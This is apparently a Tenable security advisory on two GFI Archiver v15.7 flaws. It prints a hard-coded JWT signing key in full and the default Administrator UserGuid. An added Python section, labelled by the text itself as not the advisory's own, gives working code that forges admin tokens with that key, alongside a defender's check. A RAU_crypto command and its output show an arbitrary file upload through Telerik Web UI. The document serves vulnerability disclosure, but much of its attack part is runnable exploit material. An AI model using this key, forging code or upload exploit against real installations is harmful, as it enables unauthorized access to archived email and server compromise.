Synopsis
Multiple vulnerabilities exist in GFI Archiver v15.7.
CVE-2025-35940 Hard-coded ArchiverSpaApi JWT Signing Key (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)
The ArchiverSpaApi ASP.NET application uses a hard-coded JWT signing key "#L_yJh-hWb!D_HkUxv3Hg8?52Bf9+ZuWFM@2xK7bGpTyzGjv3RDYW-SHsRMPcu@^3BNN!!VFfwz-c$Za+cS86UAm3FjAjgekF%GEyVRtS-nh^RgqnaLZWtEcVQGPv+" (without quotes). Because the key ships with the product, an unauthenticated remote attacker can generate a JWT that the application verifies as valid and use it to access protected ArchiverSpaApi URL endpoints. To impersonate a particular Archiver user, the attacker needs that user's UserGuid to put in the JWT. The UserGuid for the default Administrator user can be found in <PRODUCT_INSTALLATION_DIR>\Archiver\ASPNET\Api\Profiles\Administrator:
[...]
<MailBoxList><?xml version="1.0" encoding="utf-16"?>
<MailboxUserHolder xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" Version="7.01">
<MailboxUsers>
<MailboxUser DisplayName="Administrator (Administrator)" UserGuid="1b9f1032b920284b93bf33d192619bf4" Deletable="false" Accessable="true" />
</MailboxUsers>
</MailboxUserHolder></MailBoxList>
[...]
PoC:
python3 gfi_archiver_api_static_jwt_key.py -u 'http://<target-host>/ArchiverSpaApi/api/archive/search/saved' -s '<UserGuid>'
[*] Generating a JWT token with a hard-coded signing key...
[+] JWT: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.[...].Gaq55HYm1g90-upv4vO3M26HCkVz9ZMHFeIpCE0-zoM
[*] Accessing http://<target-host>/ArchiverSpaApi/api/archive/search/saved with the generated JWT token...
[*] Response:
{"Code":200,"Version":"20240.1126.157.0","Payload":[{"savedSearch":{"id":"ff05aa7e-fe25-43c6-b23c-8f4d3b17277c","name":"LargeEmail"},"type":"Advanced","email":{"attachment":null,"contains":null,"from":null,"subject":null,"to":null,"sentDate":{"dateRange":"any","minDate":null,"maxDate":null}},"calendar":{"location":null,"contains":null,"from":null,"subject":null,"to":null,"sentDate":{"dateRange":"any","minDate":null,"maxDate":null}},"fax":{"type":null,"contains":null,"from":null,"subject":null,"to":null,"sentDate":{"dateRange":"any","minDate":null,"maxDate":null}},"file":{"fileName":null,"fileType":null,"fileDate":{"dateRange":"any","minDate":null,"maxDate":null}},"advanced":{"archives":["*"],"include":[{"field":null,"rangeField":{"fieldName":"msgsize","operator":">","value":1024},"tag":null,"folder":null}],"exclude":[],"user":{"ID":"e900365a0d50dc4db45b8384d0fc4d01","ProxyEmails":[],"DisplayName":"Administrator","UserName":"Administrator","Mail":"[email protected]"},"booleanFlag":"AND","sentDate":null}},{"savedSearch":{"id":"ff05aa7e-fe25-43c6-b23c-8f4d3b17277b","name":"Last30days"},"type":"Advanced","email":{"attachment":null,"contains":null,"from":null,"subject":null,"to":null,"sentDate":{"dateRange":"any","minDate":null,"maxDate":null}},"calendar":{"location":null,"contains":null,"from":null,"subject":null,"to":null,"sentDate":{"dateRange":"any","minDate":null,"maxDate":null}},"fax":{"type":null,"contains":null,"from":null,"subject":null,"to":null,"sentDate":{"dateRange":"any","minDate":null,"maxDate":null}},"file":{"fileName":null,"fileType":null,"fileDate":{"dateRange":"any","minDate":null,"maxDate":null}},"advanced":{"archives":["*"],"include":[{"field":{"fieldName":"attachmentandbody","query":"xfirstword"},"rangeField":null,"tag":null,"folder":null}],"exclude":[],"user":{"ID":"e900365a0d50dc4db45b8384d0fc4d01","ProxyEmails":[],"DisplayName":"Administrator","UserName":"Administrator","Mail":"[email protected]"},"booleanFlag":"AND","sentDate":"month"}},{"savedSearch":{"id":"ff05aa7e-fe25-43c6-b23c-8f4d3b17277a","name":"Last7days"},"type":"Advanced","email":{"attachment":null,"contains":null,"from":null,"subject":null,"to":null,"sentDate":{"dateRange":"any","minDate":null,"maxDate":null}},"calendar":{"location":null,"contains":null,"from":null,"subject":null,"to":null,"sentDate":{"dateRange":"any","minDate":null,"maxDate":null}},"fax":{"type":null,"contains":null,"from":null,"subject":null,"to":null,"sentDate":{"dateRange":"any","minDate":null,"maxDate":null}},"file":{"fileName":null,"fileType":null,"fileDate":{"dateRange":"any","minDate":null,"maxDate":null}},"advanced":{"archives":["*"],"include":[{"field":{"fieldName":"attachmentandbody","query":"xfirstword"},"rangeField":null,"tag":null,"folder":null}],"exclude":[],"user":{"ID":"e900365a0d50dc4db45b8384d0fc4d01","ProxyEmails":[],"DisplayName":"Administrator","UserName":"Administrator","Mail":"[email protected]"},"booleanFlag":"AND","sentDate":"week"}}]}
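The two steps above (read the Administrator UserGuid out of the Profiles file, then mint an HS256 token under the hard-coded key) worked through in Python, with the defender's counterpart: checking whether a token an instance actually issued still verifies under the published key. This is an added example, not the advisory's gfi_archiver_api_static_jwt_key.py and not GFI code. It assumes the API accepts HS256 and that the mailbox user travels in a claim named "UserGuid" with standard iat/exp claims; the advisory elides the real payload, so those claim names are a guess. SAMPLE_PROFILE is the advisory's own Profiles excerpt embedded as sample input.

```python
"""Forge and verify ArchiverSpaApi-style HS256 JWTs with the leaked signing key.

Added example for CVE-2025-35940; not the advisory's PoC script and not GFI
code. Assumption: the API verifies HS256 and carries the user in a "UserGuid"
claim (claim name guessed; the advisory does not show the payload).
"""
import base64
import hashlib
import hmac
import json
import re
import secrets
import time

# Signing key copied verbatim from the advisory.
HARDCODED_KEY = "#L_yJh-hWb!D_HkUxv3Hg8?52Bf9+ZuWFM@2xK7bGpTyzGjv3RDYW-SHsRMPcu@^3BNN!!VFfwz-c$Za+cS86UAm3FjAjgekF%GEyVRtS-nh^RgqnaLZWtEcVQGPv+"

# Sample input: the ASPNET\Api\Profiles\Administrator excerpt quoted in the advisory.
SAMPLE_PROFILE = """<MailBoxList><?xml version="1.0" encoding="utf-16"?>
<MailboxUserHolder xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" Version="7.01">
<MailboxUsers>
<MailboxUser DisplayName="Administrator (Administrator)" UserGuid="1b9f1032b920284b93bf33d192619bf4" Deletable="false" Accessable="true" />
</MailboxUsers>
</MailboxUserHolder></MailBoxList>"""


def userguid_from_profile(profile_text, display_name="Administrator"):
    """Return the UserGuid of the first MailboxUser whose DisplayName starts with
    display_name. The file nests an XML declaration inside <MailBoxList>, so it is
    not well-formed XML; a regex over the MailboxUser elements is the pragmatic parse."""
    for m in re.finditer(r"<MailboxUser\s+([^>]*?)/>", profile_text):
        attrs = dict(re.findall(r'(\w+)="([^"]*)"', m.group(1)))
        if attrs.get("DisplayName", "").startswith(display_name):
            return attrs.get("UserGuid")
    return None


def b64url(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def unb64url(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def mint_hs256(claims, key):
    """header.payload.signature, HMAC-SHA256 over the two base64url-encoded parts."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = ".".join(
        b64url(json.dumps(part, separators=(",", ":")).encode()) for part in (header, claims)
    )
    sig = hmac.new(key.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def forge_user_token(user_guid, now=None, lifetime=3600):
    """The attacker's step: a token for any UserGuid, signed with the leaked key.
    The "UserGuid" claim name is an assumption (see module docstring)."""
    now = int(time.time()) if now is None else now
    return mint_hs256({"UserGuid": user_guid, "iat": now, "exp": now + lifetime}, HARDCODED_KEY)


def verifies_under(token, key):
    """Constant-time HS256 check; anything that is not HS256 (e.g. alg=none) fails."""
    try:
        h, p, s = token.split(".")
        header = json.loads(unb64url(h))
        sig = unb64url(s)
    except ValueError:  # wrong part count, bad base64 or bad JSON
        return False
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return False
    expected = hmac.new(key.encode(), (h + "." + p).encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, sig)


def claims_of(token):
    return json.loads(unb64url(token.split(".")[1]))


def uses_leaked_key(token):
    """Defender's triage check: feed in a token the instance itself issued (from a
    browser session or proxy capture). If it verifies under HARDCODED_KEY, the
    instance still signs with the published key and is exposed."""
    return verifies_under(token, HARDCODED_KEY)


def fresh_key(nbytes=48):
    """What a fix needs: a random per-installation key, not a build-time constant."""
    return secrets.token_urlsafe(nbytes)


if __name__ == "__main__":
    guid = userguid_from_profile(SAMPLE_PROFILE)
    tok = forge_user_token(guid)
    print("forged token:", tok)
    print("verifies under leaked key:", uses_leaked_key(tok))
    print("verifies under a rotated key:", verifies_under(tok, fresh_key()))
```

The header segment produced by mint_hs256 is the same eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 prefix seen in the PoC output above, which confirms the HS256 header layout; only the payload claim names are assumed. Because the key is shared across every installation, rotating it on one host does nothing for the others, and verifies_under shows the only durable signal a defender has: a token minted under the published key either verifies (still exposed) or it does not.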
Incomplete security fix in v15.7 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
The release notes for GFI Archiver v15.7 at https://gfi.ai/products-and-solutions/network-security-solutions/archiver/resources/documentation/product-releases state "resolved vulnerabilities: CVE-2019-18935, CVE-2017-11317, CVE-2014-2217", probably in response to ZDI advisory https://www.zerodayinitiative.com/advisories/ZDI-24-1671/.
However, the Telerik Web UI assembly (Telerik.Web.UI.dll) in GFI Archiver 15.7 appears to still be version 2013.1.417, and the PoC for CVE-2017-11317 at https://github.com/bao7uo/RAU_crypto still works against it:
python3 RAU_crypto.py -P 'C:\\Windows\\Temp' 2013.1.417 /usr/bin/passwd http://<target-host>/Archiver/Telerik.Web.UI.WebResource.axd?type=rau
RAU_crypto by Paul Taylor / @bao7uo
CVE-2017-11317, CVE-2019-18935 - Telerik RadAsyncUpload hardcoded keys / arbitrary file upload / .NET deserialisation
Local file path: /usr/bin/passwd
Destination file name: passwd
Destination path: C:\\Windows\\Temp
Version: 2013.1.417
Preparing payload...
Payload prep done
Preparing to send request to http://<target-host>/Archiver/Telerik.Web.UI.WebResource.axd?type=rau
Request done
{"fileInfo":{"FileName":"RAU_crypto.bypass","ContentType":"text/html","ContentLength":118168,"DateJson":"2019-01-02T03:04:05.067Z","Index":0}, "metaData":"CS8S/Z0J/b2982DRxDin0BBslA7fI0cWMuWlPu4W3Fn4b33Z0hQVQCUP71PBbGFUekWDSYfi+clapiJ/VqwCXbOdM4tTDHuN/bJ5tVyBeRaWEPw08wHDNvS6XkL/J/ZH+Jk5ph/74j/JrbLrIsjrW2fDCY9rlPlVnyxnOICbNv0KYp/+2/wAFq0/6VSPBI/ljau8C/U7OIWMuyuRYi/lK+oOCpe/9sWSPWs/DPHjYEHxTQeJURchx0UN+3W0oQHwGu53bU3uH3q1ewy/hGWPprnd3BKy42FPqJHtu8aqng1zHmPwrP3kMAlTMg4AH5cdE5khcCrhoy/Y8DCcRCDgPMNi/pgt7I2uBODsQ2kfnkCkcA5UAaJaBPYU/KHeWyegiBqSTkVgc4ONr87bYlXx47PuJkD6PNZ4mAHUZp2ptB5jhWZnKTOgu2rxpHNNPAOpxwaz6e+4if1UhQdRjGTJbw==" }
Solution
Upgrade to version 15.9 or later.
Additional References
https://gfi.ai/products-and-solutions/network-security-solutions/archiver/resources/documentation/product-releases
Disclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]